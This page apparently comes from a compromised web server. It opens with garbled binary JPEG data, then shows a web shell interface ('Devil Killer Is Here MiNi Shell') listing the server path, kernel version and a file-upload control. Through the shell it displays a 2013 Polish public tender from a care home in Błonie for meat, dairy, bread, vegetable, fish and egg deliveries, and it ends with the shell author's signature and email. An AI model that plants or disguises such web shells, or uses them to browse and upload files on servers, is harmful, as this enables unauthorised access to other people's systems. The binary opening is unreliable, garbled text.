JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131203/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131203/498198-N-2013.html

<p class="kh_header"><b>Błonie: Przedmiotem zamówienia są stałe, powtarzające się dostawy artykułów 	żywnościowych do magazynu Zamawiającego według podziału na zadania (części):
- Zadanie nr 1 - dostawa mięsa, wędlin, drobiu i wyrobów drobiarskich;
- Zadanie nr 2 - dostawa produktów mleczarskich;
- Zadanie nr 3 - dostawa owoców cytrusowych.
- Zadanie nr 4 - dostawa różnych artykułów spożywczych ;
- Zadanie nr 5 - dostawa pieczywa;
- Zadanie nr 6 - dostawa owoców i warzyw;
- Zadanie nr 7 - dostawa ryb;
- Zadanie nr 8 - dostawa jaj;</b><br>
<b>Numer ogłoszenia: 498198 - 2013; data zamieszczenia: 03.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Bramkach , ul. Północna 18, 05-870 Błonie, woj. mazowieckie, tel. 0-22 7256127, faks 0-22 7256066.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpsbramki.org</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia są stałe, powtarzające się dostawy artykułów 	żywnościowych do magazynu Zamawiającego według podziału na zadania (części):
- Zadanie nr 1 - dostawa mięsa, wędlin, drobiu i wyrobów drobiarskich;
- Zadanie nr 2 - dostawa produktów mleczarskich;
- Zadanie nr 3 - dostawa owoców cytrusowych.
- Zadanie nr 4 - dostawa różnych artykułów spożywczych ;
- Zadanie nr 5 - dostawa pieczywa;
- Zadanie nr 6 - dostawa owoców i warzyw;
- Zadanie nr 7 - dostawa ryb;
- Zadanie nr 8 - dostawa jaj;.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1 dostawa różnych mięsa, wędlin, drobiu i wyrobów drobiowych:
 Baleron odtłuszczony	kg	120
Baleron wędzony	kg	160
Baton drobiowy z kurczaka	kg	130
Boczek prasowany	kg	140
Boczek wędzony	kg	10
Golonka wieprzowa	kg	50
Karkówka b/k	kg	60
Kaszanka	kg	140
Kiełbasa biała	kg	80
Kiełbasa cytrynowa	kg	150
Kiełbasa dębicka	kg	150
Kiełbasa krakowska	kg	100
Kiełbasa parówkowa	kg	80
Kiełbasa podwawelska	kg	60
Kiełbasa szynkowa wieprzowa	kg	100
Kiełbasa zwyczajna	kg	250
Kiełbasa żywiecka	kg	100
Korpus z indyka	kg	50
Korpus z kurczaka	kg	200
Kości schabowe	kg	500
Kości wędzone	kg	60
Kurczak cały	kg.	200
Łopatka pieczona	kg	100
Łopatka bez kości	kg	300
Mielonka wieprzowa	kg	150
Mięso wołowe gulaszowe b/k	kg	250
Mięso wołowe b/k (antrykot)	kg	50
Mortadela	kg	130
Mortadela z warzywami	kg	130
Nogi wieprzowe	kg	60
Nogi z kurczaka całe	kg	600
Ogonówka	kg	130
Parówki cienkie	kg	150
Parówki drobiowe	kg	180
Pasztet drobiowy pieczony	kg	160
Pasztetowa kremowa	kg	150
Pasztetowa drobiowa	kg	130
Pieczeń wieprzowa rzymska	kg	110
Piersi z kurczaka (filet)	kg	600
Podgardle	kg	20
Polędwica drobiowa	kg	150
Polędwica sopocka	kg	40
Polędwica z warzywami	kg	150
Salceson włoski	kg	150
Salceson ozorkowy	kg	100
Schab bez kości	kg	150
Schab pieczony	kg	20
Słonina	kg	50
Szynka gotowana	kg	150
Szynka wędzona	kg	150
Szynka drobiowa	kg	50
Wątrobianka	kg	100
Wątróbka drobiowa	kg	100
Wątróbka wieprzowa	kg	150
Żeberka paski	kg	300
Zadanie nr 2 dostawa nabiału:
Jogurt naturalny w kubku 370g	szt.	850
Masło roślinne w kostce 250g	szt.	5700
Mleko 2% w folii - 1l	l.	7300
Ser biały chudy	kg	500
Ser biały tłusty	kg	500
Ser żółty zawartość 13% tłuszczu	kg	200
Śmietana 18% - 1l	l.	170
Śmietana 30% - 1l	l.	20
Zadanie nr 3 dostawa cytrusów:
Banany	kg	350
Cytryny	kg	100
Zadanie nr 4 dostawa artykułów spożywczych:
Ananasy w puszcze 565g	szt.	80
Aromaty 9 ml	szt.	80
Bakalie (mieszanka) 20g	szt.	20
Barszcz biały 66g	szt.	210
Bazylia 10g	szt.	150
Brzoskwinie 820g	szt.	100
Budyń bez cukru 60g	szt.	250
Budyń śmietankowy 60g	szt.	100
Chrzan 320g	szt.	100
Cukier 1kg	kg	1950
Cukier puder 0,5kg	szt.	40
Cukier waniliowy 32g	szt.	200
Cynamon 20g	szt.	50
Czosnek mielony 20g	szt.	250
Drożdże	Kg	7
Dżem niskosłodzony 280g	szt.	800
Fasola czerwona konserwowa 400g	Kg	100
Fasola sucha Jaś 500g	szt.	100
Galaretka owocowa z cukrem 79g	szt.	440
Gałka muszkatołowa 20g	szt.	10
Groszek konserwowy 400g	szt.	250
Herbata granulowana 100g	Kg	95
Kakao 100g	szt.	150
Kasza gryczana 1kg	Kg	100
Kasza jęczmienna 1kg	Kg	150
Kasza manna 1kg	Kg	100
Kawa zbożowa 250g	szt.	50
Ketchup 500g min. 35% wkł. Koncentr.	szt.	150
Kisiel bez cukru 77g	szt.	400
Kisiel z cukrem 77g	szt.	200
Koncentrat pomidorowy 900g	szt.	200
Kukurydza konserwowa 400g	szt.	200
Kwasek cytrynowy 50g	szt.	60
Liście laurowe 10g	szt.	150
Majeranek 10g	szt.	300
Majonez 420g	szt.	150
Mak 1kg	Kg	15
Makaron krajanka gruba	Kg	250
Makaron muszelki 1kg	Kg	50
Makaron nitki 500g	Kg	140
Makaron rurki 1kg	Kg	50
Makaron świderki 1kg	Kg	300
Mąka pszenna typ 480 1kg	Kg	800
Mąka ziemniaczana 1kg	Kg	90
Musztarda 200g	szt.	150
Ocet 0,5l	szt.	50
Ogórki konserwowe 900g	szt.	150
Olej 1l	szt.	350
Oregano 10g	szt.	150
Papryka konserwowa 850g	szt.	100
Papryka mielona ostra 20g	szt.	100
Papryka mielona słodka 20g	szt.	100
Pasztet z drobiu 155g	szt.	200
Pieprz czarny ziarnisty 20g	szt.	50
Pieprz naturalny mielony 15g	szt.	520
Płatki jęczmienne	Kg	150
Płatki kukurydzane 	Kg	150
Płatki owsiane 1kg	Kg	100
Płatki żytnie	Kg	30
Proszek do pieczenia 3g	szt.	250
Przyprawa do drobiu 20g	szt.	100
Przyprawa do kuchni włoskiej 20g	szt.	30
Przyprawa do ryb 20g	szt.	200
Rodzynki 200g	szt.	80
Ryż 1kg	Kg	250
Sałatka szwedzka 850g	szt.	100
Soda oczyszczona 80g	szt.	30
Sól 1kg	Kg	250
Szczawa konserwowy 320g	szt.	160
Śliwki suszone 100g	Kg	5
Tymianek 10g	szt.	120
Vegetta 200g (lub równoważne)	szt.	420
Wiórki kokosowe	szt.	30
Ziele angielskie 20g	szt.	150
Zupa grzybowa 37g	szt.	200
Zupa ogonowa 62g	szt.	250
Zupa pieczarkowa 44g	szt.	150
Żelatyna 50g	szt.	80
Zadanie nr 5 dostawa pieczywa:
Bułka paryska 450g	szt.	7500
Bułka kajzerka 0g	szt.	300
Bułka słodka 100g	szt.	200
Chleb pszenno-żytni 500g	szt.	4500
Chleb razowy 500g	szt.	1600
Zadanie nr 6 dostawa warzyw i owoców:
Botwina	pęczek	120
Buraki czerwone	kg	300
Brokuły	kg	200
Cebula	kg	500
Cukinia	kg	100
Czosnek główki	główki	100
Fasola szparagowa	kg	100
Gruszki	kg	250
Jabłka	kg	2500
Kalafior	kg	300
Kapusta biała	kg	200
Kapusta czerwona	kg	100
Kapusta kiszona	kg	300
Kapusta włoska	kg	100
Kapusta pekińska	kg	220
Koper	pęczek	400
Marchew	kg	1400
Natka pietruszki	pęczek	400
ogórki kiszone	kg	300
ogórki świeże	kg	400
Papryka świeża	kg	250
Pieczarki	kg	200
Pietruszka korzeń	kg	450
Pomidory	kg	700
Por	kg	320
Rabarbar	kg	200
Rzodkiewka	pęczek	160
Truskawki	kg	250
Sałata masłowa	szt.	600
Sałata lodowa	szt.	150
Seler	kg	400
Szczypior	pęczek	400
Śliwki	kg	200
Ziemniak młody	kg	150
Ziemniaki	kg	10000
Zadanie nr 7 dostawa ryb:
Panga biała filet mrożony b/sk	kg	500
Ryba wędzona	kg	250
Śledź płaty	kg	150
Zadanie nr 8 dostawa jaj:
Jaja	szt.	22000.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie wykazania spełnienia przez Wykonawcę warunków udziału w postępowaniu, o których mowa w art. 24 st. 1 ustawy z dnia 29.01.2004 roku - Prawo Zamówień Publicznych, należy przedłożyć: oświadczenie o spełnieniu warunków określonych w at. 22ust. 1 według wzoru określonego w załączniku nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy przedłożyć wykaz wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia dostaw (w przypadku świadczeń okresowych lub ciągłych również wykonanych), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia - załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawcy zobowiązani są załączyć do oferty dokument potwierdzający stosowanie wdrożonego systemu HACCP albo oświadczenie Wykonawcy potwierdzające stosowanie zasad dobrej praktyki higienicznej (GHP).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpsbramki.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Bramkach ul. Północna 18; 05-870 Błonie, pokój nr 17..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2013 godzina 11:00, miejsce: Dom Pomocy Społecznej w Bramkach ul. Północna 18; 05-870 Błonie, pokój nr 17 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com